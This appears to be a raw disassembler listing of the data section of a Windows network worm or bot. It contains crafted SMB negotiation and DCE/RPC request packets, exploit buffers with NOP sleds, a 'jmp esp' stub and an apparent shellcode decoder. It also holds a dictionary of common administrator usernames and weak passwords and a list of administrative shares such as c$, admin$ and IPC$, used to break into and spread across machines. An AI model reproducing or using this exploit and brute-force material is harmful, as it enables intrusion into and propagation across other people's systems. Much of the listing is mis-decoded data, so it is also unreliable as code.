dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_414654 dd 20h, 0 ; DATA XREF: sub_40B32A+81�o
dd 20h, 5C005Ch, 0
aC1234561111111: ; DATA XREF: sub_40B32A+CC�o
unicode 0, <\C$\123456111111111111111.doc>,0
align 8
dword_4146A8 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 ; DATA XREF: sub_40B32A+E5�o
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dword_4146DC dd 2180310h ; DATA XREF: sub_40B32A+13C�o
dword_4146E0 dd 10016C6h ; DATA XREF: sub_40B32A+133�o
dword_4146E4 dd 100139Dh ; DATA XREF: sub_40B32A+12A�o
dword_4146E8 dd 1001C55h ; DATA XREF: sub_40B32A+113�o
dword_4146EC dd 1001C98h ; DATA XREF: sub_40B32A:loc_40B444�o
dword_4146F0 dd 5F5C0A0Dh, 2E2Fh ; DATA XREF: sub_40B32A+E�o
; sub_40B4D5+53�o ...
dword_4146F8 dd 30B0005h, 10h, 48h, 0 ; DATA XREF: sub_40B4D5+14�o
dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_414744 dd 3000005h, 10h, 5 dup(0) ; DATA XREF: sub_40B4D5+11E�o
dword_414760 dd 10005h, 2 dup(0) ; DATA XREF: sub_40B4D5+131�o
dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_4147A8 dd 0 ; DATA XREF: sub_40B4D5+266�o
dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_4147DC: ; DATA XREF: sub_40B4D5+100�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_4147E8: ; DATA XREF: sub_40B4D5+B0�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_4147F4: ; DATA XREF: sub_40B4D5+154�o
jmp short loc_414806
; ---------------------------------------------------------------------------
jmp short loc_414811
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_4147FC: ; DATA XREF: sub_40B4D5+1B3�o
jmp short near ptr word_414802
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_414802 dw 0 ; CODE XREF: .data:loc_4147FC�j
; ---------------------------------------------------------------------------
loc_414804: ; DATA XREF: sub_40B4D5+1D6�o
jmp short near ptr word_41480A
; ---------------------------------------------------------------------------
loc_414806: ; CODE XREF: .data:loc_4147F4�j
; .data:loc_414824�j
jmp short loc_41480C
; ---------------------------------------------------------------------------
db 2 dup(0)
word_41480A dw 0 ; CODE XREF: .data:loc_414804�j
; ---------------------------------------------------------------------------
loc_41480C: ; CODE XREF: .data:loc_414806�j
; DATA XREF: sub_40B4D5+1FC�o
jmp short near ptr loc_414811+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_414811: ; CODE XREF: .data:004147F6�j
; .data:loc_41480C�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_414814 dd offset loc_41005C ; DATA XREF: sub_40B4D5+24F�o
align 10h
dword_414820 dd 77F33723h ; DATA XREF: sub_40B4D5+17A�o
; ---------------------------------------------------------------------------
loc_414824: ; DATA XREF: sub_40B4D5+190�o
jmp short loc_414806
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
loc_414828: ; DATA XREF: sub_40B4D5+167�o
lahf
jnz short loc_414843
loc_41482B: ; DATA XREF: sub_40B4D5+F0�o
add [ecx+1Ch], bl
loc_41482E: ; CODE XREF: .data:loc_414838�j
add [ecx], al
loc_414830: ; DATA XREF: sub_40B4D5+D0�o
or ecx, [ebx]
sbb eax, [eax]
loc_414834: ; DATA XREF: sub_40B4D5+E0�o
jmp short near ptr dword_41483C
; ---------------------------------------------------------------------------
align 4
loc_414838: ; DATA XREF: sub_40B4D5+C0�o
jmp short loc_41482E
; ---------------------------------------------------------------------------
align 4
dword_41483C dd 85000000h ; CODE XREF: .data:loc_414834�j
; DATA XREF: sub_40BB6E+4F�o
; ---------------------------------------------------------------------------
call dword ptr [ebx+4Dh]
loc_414843: ; CODE XREF: .data:00414829�j
inc edx
jb short $+2
; ---------------------------------------------------------------------------
dw 0
dd 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_4148C8 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40BB6E+8C�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_414974 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40BB6E+BF�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_414A54 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B7A2+76�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_0: ; DATA XREF: sub_40B7A2+9D�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_414AB8 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B7A2+102�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_414B24 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B7A2+13B�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_414BC8 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B7A2+36E�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_414C48 dd offset loc_401494+1 ; DATA XREF: sub_40B7A2+39B�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_414CDC dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B7A2+23E�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_414D48 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B7A2+269�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_414DBC dd 0 ; DATA XREF: sub_40B7A2+29A�o
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_414E44 proc near ; DATA XREF: sub_40B7A2+35B�o
sub sp, 71Ch
jmp esp
sub_414E44 endp
; ---------------------------------------------------------------------------
align 4
dword_414E4C dd 1004600h, 7515123Ch, 751C123Ch ; DATA XREF: sub_40B7A2+348�o
; ---------------------------------------------------------------------------
loc_414E58: ; DATA XREF: sub_40B7A2+1C1�o
jmp short loc_414E60
; ---------------------------------------------------------------------------
dw 6EBh
align 10h
loc_414E60: ; CODE XREF: .data:loc_414E58�j
; DATA XREF: sub_40BCAB+A0�o ...
mov edx, 5042B68Ah
push ds
loc_414E66: ; DATA XREF: sub_40BCAB+54�o
rol byte ptr [edx+12h], 1
add [eax], eax
xor al, 0
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 150000h, 1B000106h, 20100h, 30C001Ch, 4002800h, 20008FFh
dd 10h, 0
dword_414E90 dd 34EEA51Bh, 0 ; DATA XREF: sub_40BCAB+7C�o
dword_414E98 dd 12400h, 0 ; DATA XREF: sub_40BCAB+136�o
a3333 db '3333',0 ; DATA XREF: sub_40BCAB+D6�o
align 4
aCccc db 'CCCC',0 ; DATA XREF: sub_40BCAB+8E�o
align 10h
dword_414EB0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_40BE08+4E�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_414F3C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40BE08+9D�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_414FE8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40BE08+D5�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4150C8 dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40BE08+11D�o
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dword_4150FC dd 3F3F0000h, 3F3F3Fh, 0 ; DATA XREF: sub_40BE08+15F�o
dword_415108 dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40BE08+1DA�o
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 0
dword_415174 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40BE08+21F�o
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_415218 dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40BE08+280�o
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
db 8 dup(90h)
; ---------------------------------------------------------------------------
jmp short loc_4152E2
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_4152EA
; ---------------------------------------------------------------------------
loc_4152E2: ; CODE XREF: .data:004152D8�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_4152EA: ; CODE XREF: .data:004152E0�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 9090767Ah
nop
nop
nop
nop
nop
jmp short loc_415339
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_415339: ; CODE XREF: .data:0041532F�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dword_41534C dd 90080000h, 424D53FFh ; DATA XREF: sub_40BE08:loc_40C08F�o
db 25h
byte_415355 db 3 dup(0) ; DATA XREF: .data:off_4130CC�o
dd 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
db 8 dup(90h)
; ---------------------------------------------------------------------------
jmp short loc_415416
; ---------------------------------------------------------------------------
align 10h
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41541E
; ---------------------------------------------------------------------------
loc_415416: ; CODE XREF: .data:0041540C�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41541E: ; CODE XREF: .data:00415414�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
jns short near ptr word_41548E
add [ecx], eax
jmp short loc_41545E
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
db 2 dup(90h)
; ---------------------------------------------------------------------------
loc_41545E: ; CODE XREF: .data:00415454�j
nop
nop
nop
nop
nop
jmp short loc_41546D
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41546D: ; CODE XREF: .data:00415463�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dword_415480 dd 7E0h, 4, 0 ; DATA XREF: sub_40BE08+2B9�o
db 2 dup(0)
word_41548E dw 0 ; CODE XREF: .data:00415450�j
dword_415490 dd 0D0EC8166h, 7 ; DATA XREF: sub_40C225+D9�o
dword_415498 dd 129F74h, 0 ; DATA XREF: sub_40C225+380�o
dword_4154A0 dd 127D78h, 0 ; DATA XREF: sub_40C225+3E5�o
; =============== S U B R O U T I N E =======================================
sub_4154A8 proc near ; DATA XREF: sub_40C225+10B�o
; FUNCTION CHUNK AT 004154AE SIZE 00000049 BYTES
pusha
jmp short loc_4154AE
sub_4154A8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4154AB proc near ; CODE XREF: sub_4154A8:loc_4154AE�p
pop ebx
push ebx
retn
sub_4154AB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4154A8
loc_4154AE: ; CODE XREF: sub_4154A8+1�j
call sub_4154AB
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_4154BB: ; CODE XREF: sub_4154A8+3C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_4154BB
popa
loc_4154E7: ; DATA XREF: sub_40C225+EA�r
add [ebx+31h], al
loc_4154EA: ; DATA XREF: sub_40C225+E4�r
mov ebp, 7FC77h
loc_4154EF: ; DATA XREF: sub_40C225:loc_40C540�r
; sub_40C225+348�r ...
add [ecx], al
inc ebx
loc_4154F2: ; CODE XREF: sub_4154A8+4C�j
xor eax, eax
ja short loc_4154F2
pop es
; END OF FUNCTION CHUNK FOR sub_4154A8
; ---------------------------------------------------------------------------
db 0
dd 4F020100h, 7E7655Bh, 0
dd 195h
dword_415508 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: sub_40C225+2CD�o
dword_41551C dd 6BFFD098h, 3610A112h, 0C3463398h, 5A347EF8h, 0
; DATA XREF: sub_40C225+29E�o
dword_415530 dd 65706970h, 736B775Ch, 637673h ; DATA XREF: sub_40C225+236�o
dword_41553C dd 24637069h, 0 ; DATA XREF: sub_40C225+1DF�o
dword_415544 dd 73255C5Ch, 5Ch ; DATA XREF: sub_40C225+1CC�o
; sub_40C225+223�o
dword_41554C dd 2Eh ; DATA XREF: sub_40C225+1AF�o
dword_415550 dd 73255C5Ch, 0 ; DATA XREF: sub_40C225+18F�o
dword_415558 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_40C794+AD�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_4155A4 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_40C794+F2�o
; ---------------------------------------------------------------------------
loc_4155C0: ; DATA XREF: sub_40C794+124�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_4155D4 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_40C794+14D�o
a5000 db '5000',0 ; DATA XREF: sub_40C794+28�o
align 10h
byte_4155F0 db 90h ; DATA XREF: sub_40C90F+1E�r
; sub_40C90F+49�r ...
dword_4155F1 dd 0 ; DATA XREF: sub_40C90F+77�r
db 9Eh, 2 dup(0)
dd 0F50000h, 0F8000000h, 0
dd 0F9h, 0FC00h, 0FD0000h, 27000000h, 1, 12Fh, 13700h
dd 13F0000h, 40000000h, 1, 441h, 84200h, 2430000h, 45000000h
dd 40h, 1046h, 204700h, 1480000h, 49000000h, 4, 84Ah, 24B00h
dd 404D0000h, 4E000000h, 10h, 204Fh, 19800h, 19F0000h
dd 91000000h, 5, 992h, 39300h, 41950000h, 96000000h, 11h
dd 2197h, 99900h, 0
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOemuser ; "oemuser"
dd offset aWwwadmin ; "wwwadmin"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aGod ; "god"
dd offset aDomain ; "domain"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aData ; "data"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aMain ; "main"
dd offset aLan_0 ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aOwner ; "owner"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dd offset aC_1 ; "c$"
dd offset aD ; "d$"
dd offset aE_0 ; "e$"
dd offset aCShared ; "c$\\shared"
dd offset aDShared ; "d$\\shared"
dd offset aEShared ; "e$\\shared"
dd offset aCWinnt ; "c$\\winnt"
dd offset aCWindows ; "c$\\windows"
dd offset aCWinntSystem32 ; "c$\\winnt\\system32"
dd offset aCWindowsSystem ; "c$\\windows\\system32"
dd offset aAdminSystem32 ; "Admin$\\system32"
dd offset aAdmin_0 ; "admin$"
dd offset aCDocumentsAndS ; "C$\\Documents and Settings\\All Users\\Doc"...
dd offset aPrint ; "print$"
dd offset aIpc ; "IPC$"
align 10h
dd offset byte_417B60
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aA_1 ; "a"
dd offset aAb ; "ab"
dd offset aAbc ; "abc"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aDba ; "dba"
dd offset aPass1234 ; "pass1234"
dd offset aPass ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset aWork ; "work"
dd offset aDeadline ; "deadline"
dd offset aPayday ; "payday"
dd offset aSecret ; "secret"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset a2005 ; "2005"
dd offset aTest ; "test"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aNull ; "null"
dd offset aTemp ; "temp"
dd offset aTemp123 ; "temp123"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aSex ; "sex"
dd offset aLetmein ; "letmein"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWwwadmin ; "wwwadmin"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aMoney ; "money"
dd offset aLove ; "love"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_0 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan_0 ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aOwner ; "owner"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 8
